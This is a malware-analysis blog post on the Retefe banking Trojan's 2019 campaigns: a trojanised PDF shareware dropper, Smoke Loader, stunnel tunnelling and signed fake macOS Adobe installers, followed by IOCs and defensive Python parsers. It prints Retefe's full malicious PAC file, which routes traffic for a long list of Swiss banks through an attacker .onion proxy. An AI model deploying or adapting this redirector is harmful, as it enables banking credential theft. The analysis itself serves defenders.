Retefe is a banking Trojan that has historically routed online banking traffic intended for targeted banks through a proxy, rather than using the web injects more typical of other bankers. In the past, Retefe campaigns have targeted Austria, Sweden, and Switzerland, among other regions, and have also targeted users of UK online banking sites. Retefe is generally delivered via zipped JavaScript as well as Microsoft Word documents [1].

Although Retefe only appeared infrequently in 2018, the banker returned to more regular attacks on Swiss and German victims in April of 2019 with both a Windows and macOS version.

Retefe’s return to the landscape was marked by several noteworthy changes:

  • Using stunnel instead of TOR to secure its proxy redirection and command and control communications
  • The use of Smoke Loader rather than sLoad as an intermediate loader
  • The abuse of a shareware application known as “Convert PDF to Word Plus 1.0”; this is a Python script that has been packaged as an executable using PyInstaller and then compressed with the UPX executable packer.

Abused Shareware as Part of the Retefe Installation Stack

Proofpoint researchers identified the abused shareware application in a public malware repository in March 2019. It originates from http://lettercreate.com/unipdf/convert-pdf-to-word-plus[.]exe and is signed with a certificate issued by DigiCert.

The certificate subject's Common Name (CN) is “BULDOK LIMITED/emailAddress=admin@buldoklimited[.]info”.

Figure 1 shows the resulting Python code once the executable has been unpacked, unpackaged, and decompiled.

Figure 1: Resulting Python code when convert-pdf-to-word-plus.exe is unpacked, unpackaged, and decompiled.

The Python script writes two files named convert-pdf-to-word-plus.exe and convert-pdf-to-word-plus_driver.exe to the %TEMP% directory and executes them.

We currently believe that the convert-pdf-to-word-plus.exe file is a legitimate installer for the “Convert PDF to Word Plus” application (Figure 2) and is executed as a decoy.

Figure 2: Convert PDF to Word Plus Installer

Convert-pdf-to-word-plus_driver.exe, on the other hand, is malicious and is Retefe’s loader. As can be seen in Figure 3, the loader extracts 7-Zip and stunnel from its resources, then decrypts and executes the main Retefe JavaScript code.

Figure 3: Retefe Loader

As shown in the figure above, Retefe extracts stunnel from a compressed archive in place of the usual Tor and socat proxy setup. Together with the use of the abused shareware as a decoy and the switch to Smoke Loader, this is the most significant change observed in Retefe’s behavior.
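The loader described above is a PyInstaller-built executable that was additionally UPX-packed. The following static triage helper is an added example written for this post; it is not Proofpoint's tooling and does not come from the sample. It recognises both packaging layers from byte markers alone: UPX leaves its section names and version stamp in the file, and PyInstaller appends a CArchive whose cookie starts with a fixed magic and, for PyInstaller 2.1 and later, carries the package length, TOC position, Python version and the bundled Python DLL name in an 88-byte structure. The sample bytes are constructed here so the script runs offline; the field values in them are invented.

```python
"""Static triage for a PyInstaller + UPX packaged executable (added example)."""
import struct

# PyInstaller's CArchive cookie: 8-byte magic, package length, TOC offset,
# TOC length, Python version and the bundled Python DLL name (64 bytes).
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FORMAT = "!8sIIii64s"                   # PyInstaller 2.1+ cookie layout
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)   # 88 bytes

# UPX leaves its section names and its "UPX!" version stamp in the packed file.
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")


def parse_pyinstaller_cookie(data: bytes):
    """Decode the last PyInstaller cookie in the blob, or return None if absent.

    The CArchive is an overlay appended after the PE image, and UPX copies the
    overlay through unchanged by default, so the cookie is normally visible even
    before the UPX layer is removed. If it is not, unpack the UPX layer first.
    """
    pos = data.rfind(PYINSTALLER_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        return None
    _magic, pkg_len, toc_pos, toc_len, pyvers, pylib = struct.unpack_from(
        COOKIE_FORMAT, data, pos)
    return {
        "cookie_offset": pos,
        "package_length": pkg_len,
        "toc_offset": toc_pos,
        "toc_length": toc_len,
        "python_version": pyvers,                 # stored as e.g. 36 for Python 3.6
        "python_lib": pylib.rstrip(b"\0").decode("ascii", "replace"),
    }


def triage_packaging(data: bytes) -> dict:
    """Report which packaging layers the blob shows evidence of."""
    cookie = parse_pyinstaller_cookie(data)
    return {
        "is_pe": data[:2] == b"MZ",
        "upx_packed": any(marker in data for marker in UPX_MARKERS),
        "pyinstaller": cookie is not None,
        "cookie": cookie,
    }


def build_constructed_sample() -> bytes:
    """Constructed stand-in for a packed executable; not a real sample.

    A PE header stub, UPX section names, and an appended PyInstaller cookie
    claiming a 16 KiB package built against python36.dll.
    """
    cookie = struct.pack(COOKIE_FORMAT, PYINSTALLER_MAGIC,
                         0x4000, 0x3F00, 0x100, 36, b"python36.dll")
    return (b"MZ" + b"\0" * 60
            + b"UPX0\0\0\0\0UPX1\0\0\0\0" + b"\0" * 32
            + cookie)


if __name__ == "__main__":
    result = triage_packaging(build_constructed_sample())
    for key, value in result.items():
        print(f"{key}: {value}")
```

A positive result for both layers tells an analyst the order of operations the post describes: strip UPX first, then extract the PyInstaller archive and decompile the embedded .pyc to reach the dropper logic shown in Figure 1.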

Smoke Loader Now Bootstraps Retefe

On April 17, Proofpoint researchers observed a geographically targeted campaign against Switzerland using the email lure below (Figure 4). This campaign used an Object Linking and Embedding (OLE) package to deliver Smoke Loader.

Approximately two hours following infection, we observed Smoke Loader downloading Retefe with the following hash:


Figure 4: Lure document used to drop Smoke Loader, which in turn downloads Retefe

A copy of the Retefe dropper PowerShell script can be downloaded here for further analysis:


This script contains the content required for Retefe persistence, including the scheduled tasks for 7-Zip and the stunnel secure tunneling software.

Secure Tunneling (stunnel) Replaces Tor

It is not clear why Retefe’s authors have now deprecated Tor in favor of stunnel. However, we suspect that the use of a dedicated tunnel rather than Tor makes for a more secure connection because it eliminates the possibility of snooping on the hops between Tor nodes. Tor is also a “noisier” protocol and thus would be easier to detect in an enterprise environment than stunnel, whose traffic would look like any other outbound SSL connection.

Proxy Information From the Retefe Binary

Below is a portion of the proxy configuration that lists the online banking sites whose users are targeted by this instance of Retefe. The complete proxy configuration is in the appendix.

function FindProxyForURL(url, host) {
    var proxy = "PROXY ltro3fxssy7xsqgz.onion:5588;";
    var hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch',
      '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch',
      /* ... remaining targeted hosts elided in this excerpt; see the full configuration in the appendix ... */
      '*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mirabaud.lu');
    // First matching wildcard pattern wins and the request is sent through the attacker's proxy.
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy;
        }
    }
    // The closing braces and the fall-through result were cut off in the published excerpt;
    // "DIRECT" (no proxy) is assumed here as the result for every other host.
    return "DIRECT";
}
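Because the proxy configuration above is a standard PAC file, a defender can evaluate it offline to learn exactly which hostnames it would divert, without running the script in a browser. The following Python is an added example written for this post (not Proofpoint's code and not part of the Retefe configuration): it extracts the proxy string and host pattern list with regular expressions, ports the PAC helper shExpMatch (where `*` matches any run of characters, `?` a single character, and the whole hostname must match), and applies the same first-match logic. The embedded PAC text is constructed with a placeholder proxy address and a handful of patterns taken from the page; it is not the full configuration.

```python
"""Evaluate a Retefe-style PAC file offline to see which hosts it would proxy (added example)."""
import re

# Constructed PAC text in the same shape as the Retefe configuration. The proxy
# address is a placeholder and only a few of the page's host patterns are kept.
SAMPLE_PAC = """function FindProxyForURL(url, host) {
   var proxy = "PROXY proxy.invalid:8080;";
   var hosts = new Array('cs.directnet.com', '*ubs.com', '*bkb.ch', '*.clientis.ch',
     'clientis.ch', '*cash.ch', '*retefe*.ch');
   for (var i = 0; i < hosts.length; i++) {
       if (shExpMatch(host, hosts[i])) {
           return proxy;
       }
   }
   return "DIRECT";
}
"""


def sh_exp_match(text: str, pattern: str) -> bool:
    """Python port of the PAC helper shExpMatch.

    '*' matches any run of characters, '?' matches exactly one, and browsers
    anchor the pattern so the whole string must match.
    """
    regex = "^" + re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".") + "$"
    return re.match(regex, text) is not None


def extract_pac_config(pac_text: str):
    """Pull the proxy string and host pattern list out of the PAC text
    with regular expressions, so no JavaScript is ever executed."""
    proxy = re.search(r'var\s+proxy\s*=\s*"([^"]*)"', pac_text).group(1)
    array_body = re.search(r"new\s+Array\((.*?)\);", pac_text, re.S).group(1)
    patterns = re.findall(r"'([^']*)'", array_body)
    return proxy, patterns


def find_proxy_for_host(host: str, proxy: str, patterns) -> str:
    """Mirror the PAC function: the first matching pattern wins, otherwise DIRECT."""
    for pattern in patterns:
        if sh_exp_match(host, pattern):
            return proxy
    return "DIRECT"


def classify_hosts(pac_text: str, hosts) -> dict:
    """Map each candidate hostname to the decision the PAC would make for it."""
    proxy, patterns = extract_pac_config(pac_text)
    return {h: find_proxy_for_host(h.lower(), proxy, patterns) for h in hosts}


if __name__ == "__main__":
    # Candidate hostnames are constructed for the demonstration.
    candidates = ["e-banking.ubs.com", "www.clientis.ch", "notbkb.ch", "example.com"]
    for host, decision in classify_hosts(SAMPLE_PAC, candidates).items():
        print(f"{host:25s} -> {decision}")
```

Two things worth noticing when running this: a leading `*` with no dot (as in `*bkb.ch`) is broader than a subdomain match and also catches unrelated hosts that merely end in the same string, and the `*retefe*.ch` entry matches the malware's own name, which suggests a test domain left in by the authors. Both make the pattern list a useful hunting artifact in its own right.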
Malware Masquerading as Adobe Installer Applications

Figure 5: macOS Adobe Cloud installer

Unlike the Retefe campaigns targeting Microsoft Windows hosts until December 2018, campaigns targeting macOS have continued throughout the first several months of 2019. These campaigns continued to use developer-signed versions of fake Adobe Installers in order to deliver their payloads.

Below is the signature used to sign the Retefe binary. By using signed binaries, actors attempt to bypass Gatekeeper, the built-in macOS security check that verifies applications are signed with a valid developer certificate before they run. The output was created by running the command codesign -dv --verbose=4 on the installer binary.

Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=341 flags=0x0(none) hashes=10+3 location=embedded
Hash type=sha1 size=20
CandidateCDHash sha1=f839edca246ddf3881cb3f2821a900b252330a59
Hash choices=sha1
Page size=4096
Signature size=8525
Authority=Developer ID Application: Oleg Kosourov (Q9HZ55M855)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=Jan 21, 2019, 3:43:51 AM
Info.plist entries=23
Sealed Resources version=2 rules=12 files=5
Internal requirements count=1 size=180

Gatekeeper enforces application integrity by checking the validity of the Developer ID associated with an application. When an app is built, it is digitally signed with a certificate tied to the developer's name. This check verifies that the application comes from the identified developer and has not been changed since it was signed. Further changes by Apple in macOS Mojave include app notarization, an additional integrity check for the signed application [2].
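The codesign output above carries the fields a responder wants to pull out quickly: the Developer ID Team ID (the stable handle for revocation requests, allow/deny lists and hunting for other binaries from the same signer), whether the chain anchors to Apple Root CA, the hash algorithms in use, and whether the hardened runtime flag is set. The parser below is an added example for this post, not Proofpoint's tooling; it reads the verbose codesign output exactly as printed above, and the `CS_RUNTIME` bit value (0x10000) is the hardened-runtime flag from Apple's code signing flag definitions.

```python
"""Parse `codesign -dv --verbose=4` output into the fields a responder needs (added example)."""
import re

# The verbose codesign output shown in the post, used here as sample input.
CODESIGN_OUTPUT = """Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=341 flags=0x0(none) hashes=10+3 location=embedded
Hash type=sha1 size=20
CandidateCDHash sha1=f839edca246ddf3881cb3f2821a900b252330a59
Hash choices=sha1
Page size=4096
Signature size=8525
Authority=Developer ID Application: Oleg Kosourov (Q9HZ55M855)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=Jan 21, 2019, 3:43:51 AM
Info.plist entries=23
Sealed Resources version=2 rules=12 files=5
Internal requirements count=1 size=180
"""

CS_RUNTIME = 0x10000  # hardened runtime bit in the CodeDirectory flags
DEVELOPER_ID_RE = re.compile(r"Developer ID Application: (.+) \(([A-Z0-9]{10})\)$")


def parse_codesign(output: str) -> dict:
    """Split Key=Value lines; Authority repeats, so it is collected as a list."""
    info = {"authorities": []}
    for line in output.splitlines():
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key == "Authority":
            info["authorities"].append(value.strip())
        else:
            info[key.strip()] = value.strip()
    return info


def analyze_codesign(output: str) -> dict:
    """Derive the signer identity and integrity properties from the raw fields."""
    info = parse_codesign(output)

    signer = team_id = None
    for authority in info["authorities"]:
        match = DEVELOPER_ID_RE.match(authority)
        if match:
            signer, team_id = match.group(1), match.group(2)

    flags_match = re.search(r"flags=(0x[0-9a-fA-F]+)", info.get("CodeDirectory", ""))
    flags = int(flags_match.group(1), 16) if flags_match else 0

    return {
        "signer": signer,
        "team_id": team_id,
        "developer_id_signed": signer is not None,
        # A genuine Developer ID chain terminates at Apple's root.
        "anchored_to_apple_root": info["authorities"][-1:] == ["Apple Root CA"],
        "hardened_runtime": bool(flags & CS_RUNTIME),
        "hash_choices": [h for h in info.get("Hash choices", "").split(",") if h],
        "timestamp": info.get("Timestamp"),
        "cdhash_sha1": info.get("CandidateCDHash sha1"),
    }


if __name__ == "__main__":
    for key, value in analyze_codesign(CODESIGN_OUTPUT).items():
        print(f"{key}: {value}")
```

In this sample the chain is a valid Developer ID chain anchored to Apple Root CA, which is exactly why Gatekeeper's certificate check alone does not stop it; the Team ID and the CDHash are the values to record and report, and the sha1-only hash choice and cleared hardened-runtime flag are the properties that later notarization requirements tighten.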


Retefe is unusual in its use of proxies to redirect victims to fake bank pages for credential theft instead of employing web injects for man-in-the-browser attacks like most banking Trojans. After a fairly lengthy absence from the landscape, its developers appear to have updated key features of the Trojan and are employing new distribution mechanisms, including fake apps and a switch to Smoke Loader as the intermediate downloader. Retefe is also notable for changing its proxy configuration, having previously used Proxifier and in 2019 moving to stunnel. As with many types of malware, developers continue to innovate, identifying new, more effective ways to infect victims and steal personal information to better monetize their attacks.


[1] https://www.govcert.admin.ch/blog/33/the-retefe-saga

[2] https://support.apple.com/en-us/HT202491


Special thanks to @JaromirHorejsi for assistance sourcing samples of Retefe

Indicators of Compromise (IOCs)

IOC Type

  • Fake convert-pdf-to-word-plus.exe
  • Legitimate convert-pdf-to-word-plus.exe
  • Retefe Loader (convert-pdf-to-word-plus_driver.exe)
  • Certificate Hash (DigiCert Certificate)
  • macOS dmg files masquerading as Adobe installer
  • Backdoored application
  • Smoke Loader downloaded Retefe
  • SmokeLoader Document
  • SmokeLoader c2

ET and ETPRO Suricata/Snort Signatures

2835551 ETPRO TROJAN Observed SmokeLoader Style Connectivity Check

2022130 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Retefe CnC)


Full proxy configuration

function FindProxyForURL(url, host) {
    var proxy = "PROXY ltro3fxssy7xsqgz.onion:5588;";
    var hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch',
'*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', '*credit-suisse.com', '*.clientis.ch',
'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', 'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch',
'*eek.ch','*szkb.ch', '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch', '*bcf.ch',
'*bcv.ch', '*juliusbaer.com', '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',
'*bankthalwil.ch', '*piguetgalland.ch', '*inlinea.ch', '*bernerlandbank.ch', '*bancasempione.ch',
'*bsibank.com', '*corneronline.ch', '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',
'*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch', '*ersparniskasse.ch', '*ekr.ch',
'*sparkasse-dielsdorf.ch', '*.eki.ch', '*bankgantrisch.ch', '*bbobank.ch', '*alpharheintalbank.ch',
'*aekbank.ch', '*acrevis.ch', '*credinvest.ch', '*zarattinibank.ch', '*appkb.ch', '*arabbank.ch',
'*apbank.ch', '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch', '*bordier.com',
'*banquethaler.com', '*bankzimmerberg.ch', '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',
'*banquecramer.ch', '*banqueduleman.ch', '*ebankingch.bcp.bank', '*bil.com', '*vontobel.com',
'*pbgate.net', '*bnpparibas.com', '*ceanet.ch', '*ce-riviera.ch', '*cedc.ch', '*cmvsa.ch',
'*ekaffoltern.ch', '*glarner-regionalbank.ch', '*cen.ch', '*cbhbank.com', '*coutts.com',
'*cimbanque.net', '*commerzbank.com', '*dominickco.ch', '*efginternational.com', '*falconpb.com',
'*gemeinschaftsbank.ch', '*frankfurter-bankgesellschaft.com', '*globalance-bank.com', '*ca-nextbank.ch',
'*hsbcprivatebank.com', '*leihkasse-stammheim.ch', '*incorebank.ch', '*lienhardt.ch', '*maerki-baumann.ch',
'*mirabaud.com', '*pbihag.ch', '*rahnbodmer.ch', '*mybancaria.ch', '*reyl.com', '*saanenbank.ch',
'*sebgroup.com', '*slguerbetal.ch', '*bankslm.ch', '*neuehelvetischebank.ch', '*slr.ch', '*slwynigen.ch',
'*sparkasse.ch', '*umtb.ch', '*trafina.ch', '*ubp.com', 'direct.directnet.com', '*tkb.ch',
'onlinebanking.directnet.com', 'onlinebanking.nab.ch', 'onlinebankingbusiness.nab.ch', '*cler.ch',
'mabanque.bnpparibas', '*llb.li', '*bankfrick.li', '*vpbank.com', '*bankalpinum.com', '*unionbankag.com',
'*neuebankag.li', '*raiffeisen.li', '*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mirabaud.lu');
    // First matching wildcard pattern wins and the request is sent through the attacker's proxy.
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy;
        }
    }
    // The closing braces and the fall-through result were cut off in the published copy;
    // "DIRECT" (no proxy) is assumed here as the result for every other host.
    return "DIRECT";
}


